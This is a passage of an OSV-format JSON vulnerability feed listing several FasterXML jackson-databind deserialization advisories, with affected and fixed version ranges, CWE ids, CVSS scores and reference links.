"2.7.9.3", "2.7.9.4" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.7.9.4", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/01/GHSA-645p-88qh-w398/GHSA-645p-88qh-w398.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.6.7.3" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/01/GHSA-645p-88qh-w398/GHSA-645p-88qh-w398.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-14718" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2097" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHBA-2019:0959" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6a78f88716c3c57aa74ec05764a37ab3874769a347805903b393b286@%3Cdev.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/82b01bfb6787097427ce97cec6a7127e93718bc05d1efd5eaffc228f@%3Cdev.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ba973114605d936be276ee6ce09dfbdbf78aa56f6cdc6e79bfa7b8df@%3Cdev.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1d4a247329a8478073163567bbc8c8cb6b49c6bfc2bf58153a857af1@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2019/03/msg00005.html" }, { "type": "WEB", "url": "https://seclists.org/bugtraq/2019/May/68" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190530-0003" }, { "type": "WEB", "url": "https://www.debian.org/security/2019/dsa-4452" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:0782" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:0877" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1782" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1797" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1822" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1823" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2804" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2858" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3002" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3140" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3149" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3892" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:4037" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.7" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-645p-88qh-w398" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/106601" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:17:52Z", "nvd_published_at": "2019-01-02T18:29:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-6fpp-rgj9-8rwc", "published": "2019-08-01T19:18:00Z", "modified": "2024-03-15T05:18:54.134884Z", "aliases": [ "CVE-2019-14379" ], "summary": "Deserialization of untrusted data in FasterXML jackson-databind", "details": "SubTypeValidator.java in FasterXML jackson-databind before 2.9.9.2, 2.8.11.4, and 2.7.9.6 mishandles default typing when ehcache is used (because of net.sf.ehcache.transaction.manager.DefaultTransactionManagerLookup), leading to remote code execution.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.9.2" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/08/GHSA-6fpp-rgj9-8rwc/GHSA-6fpp-rgj9-8rwc.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.8.0" }, { "fixed": "2.8.11.4" } ] } ], "versions": [ "2.8.0", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/08/GHSA-6fpp-rgj9-8rwc/GHSA-6fpp-rgj9-8rwc.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.7.9.6" } ] } ], "versions": [ "2.0.0", "2.0.0-RC1", "2.0.0-RC2", "2.0.0-RC3", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4", "2.6.7.5", "2.7.0", "2.7.0-rc1", "2.7.0-rc2", "2.7.0-rc3", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/08/GHSA-6fpp-rgj9-8rwc/GHSA-6fpp-rgj9-8rwc.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-14379" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2387" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/ad418eeb974e357f2797aef64aa0e3ffaaa6125b" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f17f63b0f8a57e4a5759e01d25cffc0548f0b61ff5c6bfd704ad2f2a@%3Ccommits.ambari.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ee0a051428d2c719acfa297d0854a189ea5e284ef3ed491fa672f4be@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e25e734c315f70d8876a846926cfe3bfa1a4888044f146e844caf72f@%3Ccommits.ambari.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/d161ff3d59c5a8213400dd6afb1cce1fac4f687c32d1e0c0bfbfaa2d@%3Cissues.iceberg.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/99944f86abefde389da9b4040ea2327c6aa0b53a2ff9352bd4cfec17@%3Cissues.iceberg.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/940b4c3fef002461b89a050935337056d4a036a65ef68e0bbd4621ef@%3Cdev.struts.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/87e46591de8925f719664a845572d184027258c5a7af0a471b53c77b@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/8723b52c2544e6cb804bc8a36622c584acd1bd6c53f2b6034c9fea54@%3Cissues.iceberg.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/859815b2e9f1575acbb2b260b73861c16ca49bca627fa0c46419051f@%3Cissues.iceberg.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/75f482fdc84abe6d0c8f438a76437c335a7bbeb5cddd4d70b4bc0cbf@%3Cissues.iceberg.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/689c6bcc6c7612eee71e453a115a4c8581e7b718537025d4b265783d@%3Cissues.iceberg.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6788e4c991f75b89d290ad06b463fcd30bcae99fee610345a35b7bc6@%3Cissues.iceberg.apache.org%3E" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHBA-2019:2824" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2019/08/msg00011.html" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OVRZDN2T6AZ6DJCZJ3VSIQIVHBVMVWBL" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXRVXNRFHJSQWFHPRJQRI5UPMZ63B544" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UKUALE2TUCKEKOHE2D342PQXN4MWCSLC" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190814-0001" }, { "type": "WEB", "url": "https://support.apple.com/kb/HT213189" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2743" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2858" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2935" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2936" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2937" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2938" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2998" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3044" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3045" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3046" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3050" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3149" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3200" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3292" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3297" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3901" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0727" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/0d4b630d9ee724aee50703397d9d1afa2b2befc9395ba7797d0ccea9@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/0fcef7321095ce0bc597d468d150cff3d647f4cb3aef3bd4d20e1c69@%3Ccommits.tinkerpop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/2766188be238a446a250ef76801037d452979152d85bce5e46805815@%3Cissues.iceberg.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/2d2a76440becb610b9a9cb49b15eac3934b02c2dbcaacde1000353e4@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/34717424b4d08b74f65c09a083d6dd1cb0763f37a15d6de135998c1d@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/525bcf949a4b0da87a375cbad2680b8beccde749522f24c49befe7fb@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/56c8042873595b8c863054c7bfccab4bf2c01c6f5abedae249d914b9@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5ecc333113b139429f4f05000d4aa2886974d4df3269c1dd990bb319@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5fc0e16b7af2590bf1e97c76c136291c4fdb244ee63c65c485c9a7a1@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "http://seclists.org/fulldisclosure/2022/Mar/23" } ], "database_specific": { "cwe_ids": [ "CWE-1321", "CWE-915" ], "github_reviewed": true, "github_reviewed_at": "2019-08-01T15:38:02Z", "nvd_published_at": "2019-07-29T12:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-6wqp-v4v6-c87c", "published": "2020-06-15T18:44:51Z", "modified": "2024-03-11T05:21:31.707912Z", "aliases": [ "CVE-2018-12023" ], "summary": "Deserialization of Untrusted Data", "details": "An issue was discovered in FasterXML jackson-databind prior to 2.7.9.4, 2.8.11.2, and 2.9.6. When Default Typing is enabled (either globally or for a specific property), the service has the Oracle JDBC jar in the classpath, and an attacker can provide an LDAP service to access, it is possible to make the service execute a malicious payload.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.7.9.4" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.7.9.3", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-6wqp-v4v6-c87c/GHSA-6wqp-v4v6-c87c.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.8.0" }, { "fixed": "2.8.11.2" } ] } ], "versions": [ "2.8.0", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.8.11.1", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-6wqp-v4v6-c87c/GHSA-6wqp-v4v6-c87c.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.6" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.2", "2.9.3", "2.9.4", "2.9.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-6wqp-v4v6-c87c/GHSA-6wqp-v4v6-c87c.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-12023" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2058" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/7487cf7eb14be2f65a1eb108e8629c07ef45e0a" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/28badf7ef60ac3e7ef151cd8e8ec010b8479226a" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/bf261d404c2f79fd3406237710d40ebb03c99d84" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/7fcf88aff0d1deaa5c3c7be8d58c05ad7ad5da94b59065d8e7c50c5d@%3Cissues.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZEDLDUYBSTDY4GWDBUXGJNS2RFYTFVRC" }, { "type": "WEB", "url": "https://seclists.org/bugtraq/2019/May/68" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190530-0003" }, { "type": "WEB", "url": "https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf" }, { "type": "WEB", "url": "https://www.debian.org/security/2019/dsa-4452" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHBA-2019:0959" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:0782" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:0877" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1106" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1107" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1108" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1140" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1782" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1797" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1822" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1823" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2804" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2858" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3002" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3140" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3149" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3892" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:4037" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/105659" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-06-11T21:43:23Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-758m-v56v-grj4", "published": "2020-04-23T21:36:03Z", "modified": "2024-06-25T14:20:03.301633Z", "aliases": [ "CVE-2020-10969" ], "summary": "jackson-databind mishandles the interaction between serialization gadgets and typing", "details": "FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to javax.swing.JEditorPane.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.10.4" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.9.10.3", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/04/GHSA-758m-v56v-grj4/GHSA-758m-v56v-grj4.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-10969" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2642" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/6ba48457984943df0de92c54144f7dcae01b1221" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html" }, { "type": "WEB", "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20200403-0002" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-04-23T19:28:10Z", "nvd_published_at": "2020-03-26T13:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-85cw-hj65-qqv9", "published": "2019-09-23T18:33:45Z", "modified": "2024-03-15T05:20:15.574552Z", "aliases": [ "CVE-2019-16335" ], "summary": "Polymorphic Typing issue in FasterXML jackson-databind", "details": "A Polymorphic Typing issue was discovered in FasterXML jackson-databind before 2.9.10, 2.8.11.5, and 2.6.7.3. It is related to com.zaxxer.hikari.HikariDataSource. This is a different vulnerability than CVE-2019-14540.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.10" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/09/GHSA-85cw-hj65-qqv9/GHSA-85cw-hj65-qqv9.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.8.11.5" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6", "2.7.9.7", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/09/GHSA-85cw-hj65-qqv9/GHSA-85cw-hj65-qqv9.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.6.7.3" } ] } ], "versions": [ 